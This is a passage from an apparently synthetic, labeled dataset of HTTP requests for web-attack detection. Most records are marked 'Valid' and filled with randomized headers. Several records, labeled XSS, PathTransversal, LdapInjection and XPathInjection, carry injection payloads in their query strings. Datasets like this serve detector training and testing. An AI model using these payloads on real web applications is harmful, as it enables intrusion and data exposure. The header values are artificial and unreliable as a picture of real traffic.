UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 4.7 www.cNnwie.jpeg
Transfer-Encoding: identity
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 168.34.69.100
X-Serial-Number: 2322173255
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tbmok1ah=1450709930&nicgbn5=f2@e_nGko&sl=sai5xlPieOcaassn

End - Id: 48187
Start - Id: 47889
class: XSS
GET /aY6zWKT07iw-M../dAaseimpfC9qeidwplqt/ayZnkol6tou5pl4nt/e1KS8fhW.zaautoexec/trhwwloxerlp.css?2nll3oqsofnw0o=%3Clink++rel+%3D+%22+stylesheet++%22++++href++++%3D+%22+++++javascript%3A+++%5Balert%28%27orn2eY%27%29%3B%5D++%22%3E HTTP/1.0
Host: 229.27.61.81:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.9, identity
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 67.148.171.174
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Wed, 10 Mar 04 19:33:54 GMT
ETag: W/"Q4X7UdUMHDqZp1@o"
Expect: wqReiiom=hhgu2ntu
From: clrwp@noorqoy.ch
If-Modified-Since: Mon, 05 Nov 07 02:03:08 UTC
If-Unmodified-Since: Fri, 25 Apr 08 06:36:25 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Dec 06 23:38:36 GMT
Max-Forwards: 958
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: NTLM aXB6ZW9pbXQyMWV3VEVzb2tlaXRvdGVlaXRsdHI1bzBvYzFvZzZldGVOcmlOb3k=
Range: -43,-33,199214-
Referer: /vaiyso/r6woTo/zdedh/ebhrvt8s.dll
TE: chunked;q=0.6,deflate;q=0.6,chunked;q=0.4
Trailer: If-Range
User-Agent: egqsdp
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 084x9415
Via: 2.6 www.osr8a7.js
Transfer-Encoding: oOtNne; ig9m=sooe
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47889
Start - Id: 23140
class: Valid
GET /a9/mz7MPKhZaBUnh85UcIc/iframe6JacceptdivIFm.cgi? HTTP/1.0
Host: 231.65.18.193
Connection: keep-alive
Accept: text/plain, video/quicktime;q=0.2, audio/x-wav;q=0.8
Accept-Charset: windows-1257;q=0.2, iso-8859-2;q=0.5, x-mac-chinesesimp;q=0.9, koi8-r;q=0.3, cp-932;q=0.2
Accept-Encoding: 
Accept-Language: tiAae-afal;q=0.6
Cache-Control: min-fresh=09052
Client-ip: 122.227.85.73
Cookie: .vM6v0Lcmdkb3=vRlql@44Dsf;rt=eeLl
Cookie2: $Version="691"
Date: Fri, 09 May 08 05:52:55 CET
ETag: "ln@-DQt5MAST7dr"
Expect: kseno7lE=dU2ds;5eOtlDeH
From: xtisieil@oihdn.cz
If-Modified-Since: Fri, 03 Mar 06 02:52:55 GMT
If-Unmodified-Since: Thu, 03 Jul 08 17:08:02 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Aug 09 15:24:05 CET
Max-Forwards: 646
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM ZW43b2p5OGRvZ0FpY2V0MWRhaWF2dXlraG5sY1hyaHVueWwxaGlyaGFmbQ==
Range: 566-769965,-745
Referer: /jneign97/diITPwti/iu9ygfrZ.tiff
TE: trailers
Trailer: Referer
User-Agent: Mozilla/4.1 (Windows; U; WinNT 0.0; ai-cd; rv:8.2.0) Gecko/74459258
UA-CPU: MIPS
UA-Disp: 519,575,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 558x894
Via: 7.4 www.meovosti.tiff, 3.3 193.22.20.164, 5.2 www.do3r.jpg
Transfer-Encoding: compress
Upgrade: 1tc/8.5, saair/2.1, so6/1.5, uuaZi/5.6, n0di/4.9
Warning: 171 239.232.210.6 "br0iasmbtlifzqoe" 
X-Forwarded-For: 72.82.227.173
X-Serial-Number: 64536602678129
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23140
Start - Id: 12247
class: Valid
GET /t2dpoIwweaoNia9es5u9/aielsrrho1/rQoBSBQFzJO8SOO/nph-bK6foPnX4Qaf/inftp95R@EyWxml0.htm? HTTP/1.0
Host: 163.247.114.210:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: cp-950;q=0.0, iso-8859-3;q=0.3, iso-10646-ucs-2;q=0.2, koi8-r, isiri-3342
Accept-Encoding: *;q=0.1
Accept-Language: diitebe-st;q=0.3
Cache-Control: 5cNeYndm=shs
Client-ip: 251.112.24.90
Cookie: mNcou=6801948;ttTfnstzse10s=976;ehe= d:i;eea=hpeyeiIrytr8pf;;atdwhehtSnlwLcr=iiad9e;eli8jxeomne=715
Cookie2: $Version="8"
Date: Thu, 07 Sep 06 22:25:03 CET
ETag: W/"xj9bPbOfBXF0mYAiX9aB"
Expect: 100-continue
From: tRmfo@Moomaa.cz
If-Modified-Since: Mon, 20 Aug 07 06:41:37 UTC
If-Unmodified-Since: Wed, 03 Nov 04 11:56:02 CET
If-Match: "JpKV3_hbFn6R4o1ks"
If-None-Match: *
If-Range: Tue, 25 Apr 06 01:00:05 CET
Max-Forwards: 0
MIME-Version: 1.6
Pragma: cl=iago
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: zn5f8a zedOwr=fet0te
Range: 88-,0274-
Referer: /ioaaie/ioa1n/kext/ehaeb.jsp
TE: gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/2.0 (Machintosh; U; Mac OS X 2.9; ts-ae; rv:2.6.7) Gecko/92240096
UA-CPU: Sparc
UA-Disp: 2190,4880,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7901x792
Via: HTTP/2.9 www.u3zeEge.jpeg, 1.0 158.121.140.208
Transfer-Encoding: gzip
Upgrade: slsTt/6.9
Warning: 176 125.171.28.119 "rAswf" "Thu, 16 Oct 08 01:05:52 GMT"
X-Forwarded-For: 93.31.136.215
X-Serial-Number: 8899123917889
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12247
Start - Id: 36345
class: PathTransversal
GET /i5mv-rhbsBWfY/qd3Id5.exe?mes=%7ErAobjectn%3AoEbgroup+byn&p3autiksTd=yi&titLhnydknhdr=D%3A%2F.htaccess%7E&NK05H=7379&jt7ast=leh8Dahdqost&iiE=e%24A HTTP/1.1
Host: 98.160.185.88
Connection: close
Accept: audio/x-wav;q=0.0, image/*;q=0.7
Accept-Charset: euc-jp, us-ascii;q=0.6, iso-8859-7;q=0.1, x-mac-korean;q=0.9, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: gaDhodB-o4re;q=0.2, egj4r-taG;q=0.7, bkK-oouvdIh
Cache-Control: max-age=33
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="42"
Date: Mon, 24 Mar 08 18:23:44 UTC
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: 100-continue
From: evel@exsYchnE.cz
If-Modified-Since: Sat, 27 May 06 19:44:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 561
MIME-Version: 0.4
Pragma: j='sbtemria'
Proxy-Authorization: Digest cnonce="47it"
Authorization: ugr1d srem=oeedldf
Range: 6-770122
Referer: /ebj0N/ebPi/rMwtihI/ctnwi/ow1g.swf
Trailer: From
User-Agent: mtgfhansz (o6R2X.TG; pgXkwjaZ)
UA-CPU: x86
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: yevfed/6.1 150.195.89.202
Transfer-Encoding: deflate
X-Forwarded-For: 217.52.49.74
----: ------------------------------------

null

End - Id: 36345
Start - Id: 8697
class: Valid
GET /wmh/iTZPcWF8hm_Q03Ly5.htm?4aideonsnh=tn+wnaullhm&ulriptsse0q=80&eLerremLel=19843538&ridiymOv2v=322690&aiSomrtwrgttsn2=sa&fyebcUI=cznrfeou&rdc1soU2msrg=rD2smrjioTewe&0CdHo=7&dkiu=741966&yt=hkoXYU&ikm=exechuT9&Exp_binxv0t=novas&TBae5ec=1641&iheuy8=etsimatopNb7i1 HTTP/1.0
Host: www.66iztfpter.it
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.5, shift_jis, iso-8859-9, us-ascii, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=7484
Client-ip: 173.156.22.51
Cookie: bEuKBC=eeelmyeaRh1eethn
Cookie2: $Version="1"
Date: Tue, 08 Sep 09 09:40:29 CET
ETag: W/"iEY.oi6B6Dsil3ru0"
Expect: jrtdIyt=ts5l5sov
From: Mtotwsm@b5hmUaSS.ch
If-Modified-Since: Mon, 30 Oct 06 15:33:55 UTC
If-Unmodified-Since: Thu, 18 May 06 19:09:21 UTC
If-Match: *
If-None-Match: "@K4TF_ksW5R_QilFGb"
If-Range: Sat, 04 Aug 07 24:52:40 UTC
Max-Forwards: 612
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: Lej5y jenh=tuJastt
Range: -1251,-8,78356-
Referer: http://www.eancqfoA.biz/so15w/glaer/dnec5/E6ahe/cokRddu0.conf
TE: trailers
Trailer: Accept-Charset
User-Agent: llChkG http://www.iutVns08.org
UA-CPU: PowerPC
UA-Disp: 8125,063,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 286x293
Via: FTP/5.3 54.29.217.203
Transfer-Encoding: identity
Upgrade: 81ihR/9.8, iiess/1.4, hse/9.5
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8697
Start - Id: 27179
class: Valid
GET /Cb9eanalc/hkqO-nsGnj/o6kI0SY.uoA/h8BV/yo_LCJTopenfq/DIbinGklWhJ/etwOpaohp.html? HTTP/1.1
Host: 120.208.78.102
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.2
Accept-Encoding: compress
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 30.130.235.21
Cookie: etelde=rphp;_Yhn=3;tnetnPtseae4d=xo;tslt=44164;iltrirIXsp=2052;.perl5ftpEiDls=|inputVwgetikt
Cookie2: $Version="9"
Date: Tue, 28 Mar 06 21:59:29 CET
ETag: "G@QbMBly6v5UAVTgSi"
Expect: 100-continue
From: tnEr3ec@tnrtge.com
If-Modified-Since: Mon, 20 Dec 04 21:26:36 GMT
If-Unmodified-Since: Sat, 17 Jan 04 11:14:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 13 Jun 09 11:45:56 CET
Max-Forwards: 5
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: Digest nc=400a60cB
Range: 23428-078577
Referer: http://lsri.cz/pkuai.mp3
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: tHio (uVQWvL@x; 4z0wUojvs1; tC-op-; qCIw2B7; 0f@hq21)
UA-CPU: MIPS
UA-Disp: 451,9242,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 3319x950
Via: Mkdre/8.9 www.eaAjtl.png:29, 8.3 177.167.6.104, FTP/5.2 www.oerDy.html
Transfer-Encoding: gzip
Upgrade: Etiah/8.1, hsg/1.5
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 13.58.9.225
X-Serial-Number: 437437535
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27179
Start - Id: 11809
class: Valid
GET /q1@XycDZL5F0r./GenrrotNoIt/OnmmtDeaeiRdnnAynr.htm?ts4lto=e%40%40%40%40 HTTP/1.1
Host: www.mqlTeihe.de
Connection: close
Accept: image/gif;q=0.6
Accept-Charset: euc-cn
Accept-Encoding: identity;q=0.3
Accept-Language: cgihtcE-t7do, xio-l;q=0.7
Cache-Control: max-age=7
Client-ip: 200.252.94.25
Cookie: inputDor2tmp=rxcn;an=eS3 3>syR;nso=eIlwe5tef;urasaHpmBssms=86094;ipaeuonri=72453
Cookie2: $Version="86"
Date: Thu, 02 Nov 06 05:09:24 CET
ETag: W/"uqrlVultJdDyCTofYQ"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Thu, 03 Jun 04 18:07:32 GMT
If-Unmodified-Since: Fri, 26 Dec 08 04:50:09 UTC
If-Match: *
If-None-Match: *
If-Range: "bwVpI6qBTcPz7lyL"
Max-Forwards: 017
MIME-Version: 1.9
Pragma: hhtne=veoae
Proxy-Authorization: NTLM ZU5ud090cmxzMWR0cmFhY2V0YWVsbm9pcHdlbGR0dHN0czJyMmJtbG5zbHQ=
Authorization: o6Tr hogeh2i=ilumdPB
Range: 845-,0-,-57
Referer: /tnrhi/Si9orn/enae5d/dutlss/MesF.sh
TE: chunked;q=0.8,trailers
Trailer: TE
User-Agent: Mozilla/4.8 (X11; U; Solaris 7.8; ot-tz; rv:1.3.2) Gecko/30240215
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: HTTP/7.0 www.alr0ye.jpg
Transfer-Encoding: gzip
Upgrade: meE/0.7
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 75.214.139.60
X-Serial-Number: 63208652767395
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11809
Start - Id: 15162
class: Valid
GET /C2idsUtTnnetcatS./utaaneatae6oii/gxhaI6dnt/5likeYdP.tiff?sPasquus=ePaeo&tnneqe=htpass&8-RZw851AUZA=8d%7Ce&lc=cTd&tV_.0hbetweenfromMzYx=ve5riseaE&rtxw1z16rua9=77913562&Pir1ERwgw=tiWK_sm.SNX6&nmgersmOevloesd=eosi-s&yabwanatagg=aia&menqdwiltUusl=Trese HTTP/1.1
Host: www.elphati3e.uk
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 234.176.105.96
Cookie: nasIlOauo4=>An9fdog$httpsrt;ahxlwtkeess=6196;kohglq=97;eEoedcfpte3sno=e9F8qe.ED
Cookie2: $Version="001"
Date: Tue, 21 Dec 04 17:01:07 UTC
ETag: W/"Ib_MaPpW1SvqAe8MR"
Expect: thc8
From: 7stnsn@lhythtbTtd.it
If-Modified-Since: Sun, 18 Dec 05 09:46:06 GMT
If-Unmodified-Since: Mon, 03 Jul 06 16:10:10 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Dec 09 24:21:37 UTC
Max-Forwards: 768
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: TeEieo oaOscrm=nnas
Authorization: NTLM Um4xcjFUbWFuZnRudHFlbEUxYWNydXMzY29TTnRnaG4=
Range: -96,366774-,-767
Referer: http://www.gia7to8.st/9m0csne/ncuytj/oitoita/54Wotw7u/boxR7ft.swf
TE: deflate
Trailer: If-None-Match
User-Agent: Mozilla/9.1 (compatible; Konqueror/5.0; Open BSD i586; 1t5nSew; Seg2cea; Xtsk)
UA-CPU: Sparc
UA-Disp: 1668,172,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1372x650
Via: HTTP/3.1 33.173.217.181:4, HTTP/6.6 216.232.204.198, 2.2 www.ooto5Ed.jpeg
Transfer-Encoding: identity
Upgrade: yaDE/3.2, tcnfS/4.6, ertla/5.3, dLabi/2.9, sji6A/7.7
Warning: 615 120.85.45.38 "inrt" 
X-Forwarded-For: 155.89.71.222
X-Serial-Number: 54307917779872
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15162
Start - Id: 2272
class: Valid
GET /DyYp8-nqlls/wo0utooyohtmakaes/eoez6.jsp?itrqt5st0Sur=hi7o&liNhfjt2im87svf=531&ea2ehOThny=shselectgn HTTP/1.0
Host: www.shouIj.st:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=52
Client-ip: 111.99.151.212
Cookie: 5efbb=714619662;iNa=tlaLAz;tes8tdgmewr3=7868;dlnstr=%t cb;letrzCrhqroontn=neat
Cookie2: $Version="88"
Date: Mon, 18 Apr 05 11:32:56 UTC
ETag: "czBkLOu.NNn9-8RH"
Expect: 100-continue
From: oniNcb@l92ecsed.it
If-Modified-Since: Thu, 29 Apr 10 06:27:20 CET
If-Unmodified-Since: Fri, 25 May 07 13:24:02 CET
If-Match: *
If-None-Match: "8wTXDti6MY5I4SAK"
If-Range: *
Max-Forwards: 0
MIME-Version: 2.7
Pragma: fOte='hnttBta'
Proxy-Authorization: Digest realm
Authorization: NTLM aXhlcjJhTGVlZ2VvbmVpcWtuYWJnOXJvb2VvZXRvYXRBZQ==
Range: -458438,6075-5448
Referer: /mc7mLgd/2faurede/eomoan.png
TE: trailers
Trailer: Accept
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 0.6; lk-ue; rv:6.8.4) Gecko/23476515
UA-CPU: StrongARM
UA-Disp: 006,895,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6264x742
Via: 6.8 64.18.82.178:94, 3.3 189.71.162.101:0017, 3.6 113.60.61.58
Transfer-Encoding: gzip
Upgrade: eio/9.9, taoEis/0.9
Warning: 901 www.otieo.jpeg:79 "bTRphwcd" "Sat, 18 Dec 04 03:27:02 CET"
X-Forwarded-For: 211.5.1.135
X-Serial-Number: 61486796053346804
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2272
Start - Id: 20923
class: Valid
GET /bJP3udv79lndkAyp.F.htm?aee=Hl%3F&tefEeexaAvea=nDCVK3&neibto9u=21KVG&eaN=55taesn&4olad0dyoarafr=yconnectrehsehrdeleteU2a&isaomulahtat=4942520781&doir=9betweeno HTTP/1.1
Host: 121.213.255.110
Connection: close
Accept: image/*, audio/*, image/gif;q=0.4
Accept-Charset: x-mac-ce;q=0.0, x-mac-korean, x-mac-hebrew, euc-cn;q=0.0
Accept-Encoding: deflate, deflate;q=0.5
Accept-Language: aeFNl-6wvthHq5;q=0.1, ee6eve-norR;q=0.3
Cache-Control: max-age=9239
Client-ip: 216.79.117.202
Cookie: fmnlnReebTqyae=rdra =slsJ rotmpgQc;0da06j7aeoehse=nagYNt.;nqrsnhrywegeem=sttew0TeLfhre3o
Cookie2: $Version="0"
Date: Sun, 24 Apr 05 10:14:13 UTC
ETag: "J4lLVZZuWv7_Cno-GkD"
Expect: 100-continue
From: nu4eam@Terdm.fr
If-Modified-Since: Tue, 24 Feb 04 23:12:57 UTC
If-Unmodified-Since: Thu, 08 Nov 07 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Oct 06 15:35:07 UTC
Max-Forwards: 7
MIME-Version: 4.9
Pragma: cehnr='odainb'
Proxy-Authorization: 5lee isw1q=euaaW
Authorization: izpd men0a=anwoe
Range: 31-,-608039
Referer: http://www.a7sfaE.uk/iefeeds/ieina9t9.gz
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mjtta/3.4
UA-CPU: 68000
UA-Disp: 0973,375,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 893x470
Via: 0.4 244.104.38.234, eioej/6.1 219.22.142.145, HTTP/7.8 www.i1gyal.png
Transfer-Encoding: compress
Upgrade: de7/0.8, frcre/7.5
Warning: 524 www.ihrn.jpeg "0rnvrpiinz" "Wed, 08 Apr 09 02:51:11 UTC"
X-Forwarded-For: 61.167.166.225
X-Serial-Number: 2430605
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20923
Start - Id: 32291
class: Valid
GET /druttTriaimtiagrau8/fustudJili/2imsaTbaTfsaieaalfnO/lF/fDBm@DFwhn@v30YB/eooue/L5e/ne3Frnnix4ohts6rs9te/uIVFfqdtSY.aspx?o4xsag=hilogosi+z&g1senTnEn=o6r%2Fs HTTP/1.1
Host: www.eneejf.net:5037
Connection: keep-alive
Accept: application/postscript;q=0.0, application/*;q=0.8, application/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate
Accept-Language: *;q=0.2
Cache-Control: max-stale=6
Client-ip: 51.53.237.152
Cookie: oehdaanm= |;cvuofeykst2=kBX;ah2rota=t\uanehp8mLtnx;fdaIre1r=s;;ta5senuarruwTT=7576
Cookie2: $Version="02"
Date: Mon, 25 Oct 04 12:39:30 CET
ETag: "5PC@hhpJ@Jsu8Oiv"
Expect: 3zih
From: mnonn5h@wlv1.be
If-Modified-Since: Mon, 13 Dec 04 02:38:21 CET
If-Unmodified-Since: Tue, 02 Sep 08 21:52:17 UTC
If-Match: *
If-None-Match: "5qeLmrsRInnoAhazg7"
If-Range: Fri, 30 Jul 04 15:18:12 GMT
Max-Forwards: 3165
MIME-Version: 9.5
Pragma: le8tefn='nyek'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: orC5 4uen4ieR=bqbG8
Range: -05910,24859-707033
Referer: http://www.hTjge.org/l5oab/nee7tem1.nsf
TE: trailers,trailers,deflate;q=0.5
Trailer: Date
User-Agent: cieomoq/7.6.6.4.3
UA-CPU: x86
UA-Disp: 096,809,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3225x292
Via: FTP/3.5 www.5Lltdets.htm, 9.2 65.106.73.53
Transfer-Encoding: identity
Upgrade: oaitd/4.1, HovhhT/4.8, riGey/3.3, ga1y/9.4
Warning: 188 128.175.35.78:84438 "S5oiobSrnbBr6fnyRoo" "Thu, 12 Oct 06 18:58:00 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 7859774427
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32291
Start - Id: 37751
class: LdapInjection
GET /ortttCjq8tirnt/jZpasswd6fWWnTg5/MTFg_BNdeleteRsW/59r/PJiXSZvOSinbGq/tD4nYCh0@IrY4/DcdadeeooK/sQDFfLkK4fNo@XJb.msf?8it=wbtso2pcdrgNozihy&saernelJd5l=868%29%28%26%28objectClass%3Dtsf%29%28%7C%28sn++++%3D+++eue%29%28cn%3Diwe+J*%29%29 HTTP/1.0
Host: 227.6.13.245:95
Connection: close
Accept: application/zip;q=0.9
Accept-Charset: *
Accept-Encoding: identity, compress, compress;q=0.4, gzip, deflate;q=0.6
Accept-Language: oan8-taerUn;q=0.3, aeUecr-Bwgcaott, 2mN-iso;q=0.5
Cache-Control: no-cache
Client-ip: 18.137.252.198
Cookie: XrkLbwDallxr9=lQCsJ;dTdst=84503120;XORtZn.9fkY=e8naisea7ttebt;EIYAKi=968165316
Cookie2: $Version="98"
Date: Fri, 04 Apr 08 10:25:34 UTC
ETag: W/"ud0ipGZ2us1mYZDzhVQc"
Expect: 100-continue
From: Tnocerr@fsdzTjcit.de
If-Modified-Since: Tue, 18 Sep 07 13:11:51 GMT
If-Unmodified-Since: Wed, 27 Apr 05 11:55:22 GMT
If-Match: "TT0@dGZrYb7MKmHcoWF"
If-None-Match: "r0XA-A1E5jHQzyGng.d"
If-Range: *
Max-Forwards: 89
MIME-Version: 0.5
Pragma: fonAum=s
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 77072-956,71936-1169
Referer: /ottiexy/1jizsp.aspx
TE: deflate,gzip;q=0.2,chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: Tladsvd4eelhbbtIera
UA-CPU: MIPS
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 644x6409
Via: FTP/3.3 122.8.227.169:549, 3.8 159.204.49.145, kcq/0.1 164.204.233.202
Transfer-Encoding: compress
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 4395839
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37751
Start - Id: 22502
class: Valid
GET /ieSAuMbQ/eheLHICFaX/-NnzSXcatAWjaR_wQ/nhoqrDs/l3Ia4@.Awxtb/7enzeee2dbsdt0eOau/um0q/efRKDaBKjEKgObiq0y9m.js? HTTP/1.0
Host: www.httrdwv.com
Connection: keep-alive
Accept: video/mpeg;q=0.3, text/*;q=0.5
Accept-Charset: x-mac-chinesetrad;q=0.8, iso-8859-6;q=0.8, x-mac-japanese
Accept-Encoding: *
Accept-Language: wliwrmk-iSRgSj, og-xe, ynvna-dtjidCnk, w-X65;q=0.0, 6itT-Mr;q=0.2
Cache-Control: no-cache
Client-ip: 1.43.92.227
Cookie: Bae7paeeoiF=774520
Cookie2: $Version="82"
Date: Wed, 11 Aug 04 19:14:31 GMT
ETag: W/"wRAoqzNk_9Rb0Px8h57"
Expect: uzxrn
From: htCtf@mttsOtlOi.org
If-Modified-Since: Thu, 06 Jan 05 02:49:42 UTC
If-Unmodified-Since: Sat, 30 Jan 10 16:29:48 GMT
If-Match: "0hjYSUuA00hipetGK9"
If-None-Match: "vNIZmX5xZ8_MpfNwhh"
If-Range: Wed, 03 Aug 05 15:45:30 GMT
Max-Forwards: 50
MIME-Version: 2.9
Pragma: r3e=aeifetPN
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: NTLM b3hhZW51aGxuMXUwRmVsdHNtZnJlMHRpbmNYOXNkdHBlQjNiZUN0
Range: 97-403959,415744-,056-023107
Referer: http://hc9bso.org/ntlnddhp/klbttri/lcg52.shtml
TE: deflate
Trailer: If-None-Match
User-Agent: li4ieuule/3.7.7.2.3
UA-CPU: MIPS
UA-Disp: 3911,9683,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1822x173
Via: HTTP/4.1 229.79.124.25:660, 3.7 www.llbOw.jpg, 6.3 17.78.74.157:2
Transfer-Encoding: gzip
Upgrade: leaHT/8.3, sdhsou/7.9, acol/9.0, ikfFc/4.1, 61ealm/2.2
Warning: 515 www.vdEcm.shtml:048 "6na16YAmltecfI" 
X-Forwarded-For: 227.202.246.94
X-Serial-Number: 122676633400970
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22502
Start - Id: 48964
class: XPathInjection
GET /nltw0l2ctea/nqH.2j3yvBcmd5tb1/x_/rGQUy4e5wKelKr5A@cp/Pb/g_gkkZvy1dQCao1kg/pneKesEZh/ni1gFm8bc.asmx?ievtyntqsenso=ndrobyEhhptohex9eq&he=5&swp-y7xP=5084&aI4p5MdhomeJ=uqxxtwvVBs3x&pCj=9008&bi=io-gToaj9b_.&eaei=ne0x&w1a7002setAe=O+Eanhs&da=eao%27++++or+++0amEe%2Fgyg%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D013%5D+or+++++%27liGmoz%27++++%3D+%27 HTTP/1.1
Host: 62.68.112.219
Connection: sqtl3lm
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="171"
Date: Wed, 07 Feb 07 09:07:14 UTC
ETag: "FUkp6cY6gug6IFvU"
Expect: qyrA=htioarr;7tp5qhs
From: aaee5oT@0lekntq.de
If-Modified-Since: Tue, 07 Nov 06 19:49:31 UTC
If-Unmodified-Since: Sat, 24 Jul 04 13:31:26 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 6.3
Pragma: 8sqe=13nrb
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: 0igehl tnRi=lsneia
Range: 23-,057-,45-
Referer: http://apeonEs.biz/s21EIv/shnoT3t/ttu7ohA/ttldikn/8a8umy.ace
TE: trailers,chunked;q=0.8,chunked;q=0.4
Trailer: Accept-Encoding
User-Agent: hcin/9.1.6
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7333x919
Via: HTTP/3.4 www.otitnae.jpeg, 9.5 www.hleheOth.tiff
Transfer-Encoding: topOi
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
